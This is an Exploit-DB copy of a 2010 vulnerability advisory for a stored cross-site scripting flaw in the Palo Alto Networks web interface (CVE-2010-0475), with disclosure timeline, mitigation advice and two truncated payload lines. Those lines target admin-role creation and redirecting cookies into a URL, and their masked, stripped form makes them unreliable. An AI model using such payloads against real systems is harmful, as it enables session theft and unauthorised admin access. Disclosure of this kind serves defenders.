Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

EDB-ID: 12660 CVE: 2010-0475 OSVDB-ID: 64717
Verified: Author: Jeromie Jackson Published: 2010-05-19
Download Exploit: Source Raw Download Vulnerable App: N/A
Palo Alto Network Vulnerability - Cross-Site Scripting (XSS)

Class: Cross-Site Scripting (XSS) Vulnerability
*CVE: CVE-2010-0475 *
*Remote: Yes
Local: Yes
Published: May 11, 2010 08:30AM *
Timeline:Submission to MITRE: 1/18/2010
Vendor Contact: 2/18/2010
Vendor Response: 2/18/2010
Patch Available: 5/2010 Patched in maintenance releases (3.1.1 & 3.0.9)
*Credit: Jeromie Jackson CISSP, CISM*
        COBIT & ITIL Certified
        President- San Diego Open Web Application Security Project (OWASP)
        Vice President- San Diego Information Audit & Control Association
        SANS Mentor

Validated Vulnerable:
   Latest Version Per December 31, 2009


A Stored Cross-Site Scripting (XSS) vulnerability was found within the Palo
Alto interface. By crafting a URL that includes XSS code it is possible to
inject malicious data, redirect the user to a bogus replica of the real
website, or other nefarious activity.

Single Line working-********&cpasswd=********&role=vsysadmin


WORKING FOR REDIRECT TO LOAD cookies into URL.********&cpasswd=********&role=vsysadmin&admin-role=%5Bobject+Object%5D&bSubmit=O

A patch will be required from the vendor. It is recommended a routine to
sanitize user input be consistently implemented throughout the application
to mitigate other such occurrences within the application.

OWASP Cross-Site Scripting (XSS) Attack Discussion
Rsnake's Cross-Site Scripting (XSS) Attack Cheat sheet